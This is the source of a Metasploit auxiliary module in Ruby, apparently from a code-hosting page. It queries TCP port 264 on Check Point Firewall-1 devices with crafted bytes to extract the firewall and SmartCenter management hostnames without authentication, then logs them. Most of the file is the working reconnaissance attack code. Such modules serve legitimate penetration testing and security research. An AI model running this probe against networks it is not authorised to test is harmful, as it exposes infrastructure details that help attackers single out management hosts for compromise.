Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
13
      'Description'    => %q{
14
        This module sends a query to the port 264/TCP on CheckPoint Firewall-1
15
        firewalls to obtain the firewall name and management station
16
        (such as SmartCenter) name via a pre-authentication request. The string
17
        returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
18
        host. Whilst considered "public" information, the majority of installations
19
        use detailed hostnames which may aid an attacker in focusing on compromising
20
        the SmartCenter host, or useful for government, intelligence and military
21
        networks where the hostname reveals the physical location and rack number
22
        of the device, which may be unintentionally published to the world.
23
      },
24
      'Author'         => [ 'aushack' ],
25
      'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
26
      'References'     =>
27
        [
28
          # aushack - None? Stumbled across, probably an old bug/feature but unsure.
29
          [ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
30
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
31
        ]
32
    ))
33

34
    register_options(
35
      [
36
        Opt::RPORT(264),
37
      ])
38
  end
39

40
  def autofilter
41
    false
42
  end
43

44
  def run
45
    print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
46
    fw_hostname = nil
47
    sc_hostname = nil
48

49
    connect
50

51
    sock.put("\x51\x00\x00\x00")
52
    sock.put("\x00\x00\x00\x21")
53
    res = sock.get_once(4)
54
    if (res and res == "Y\x00\x00\x00")
55
      print_good("Appears to be a CheckPoint Firewall...")
56
      sock.put("\x00\x00\x00\x0bsecuremote\x00")
57
      res = sock.get_once
58
      if (res and res =~ /CN=(.+),O=(.+)\./i)
59
        fw_hostname = $1
60
        sc_hostname = $2
61
        print_good("Firewall Host: #{fw_hostname}")
62
        print_good("SmartCenter Host: #{sc_hostname}")
63
      end
64
    else
65
      print_error("Unexpected response: '#{res.inspect}'")
66
    end
67

68
    report_info(fw_hostname,sc_hostname)
69

70
    disconnect
71
  end
72

73
  # Only trust that it's real if we have a hostname. If you get a funny
74
  # response, it might not be what we think it is.
75
  def report_info(fw_hostname,sc_hostname)
76
    return unless fw_hostname
77
    host_info = {
78
      :host => datastore['RHOST'],
79
      :os_name => "Checkpoint Firewall-1",
80
      :purpose => "firewall"
81
    }
82
    host_info[:name] = fw_hostname
83
    host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
84
    report_host(host_info)
85
    svc_info = {
86
      :host => datastore['RHOST'],
87
      :port => datastore['RPORT'],
88
      :proto => "tcp",
89
      :name => "securemote"
90
    }
91
    report_service(svc_info)
92
  end
93
end
94

95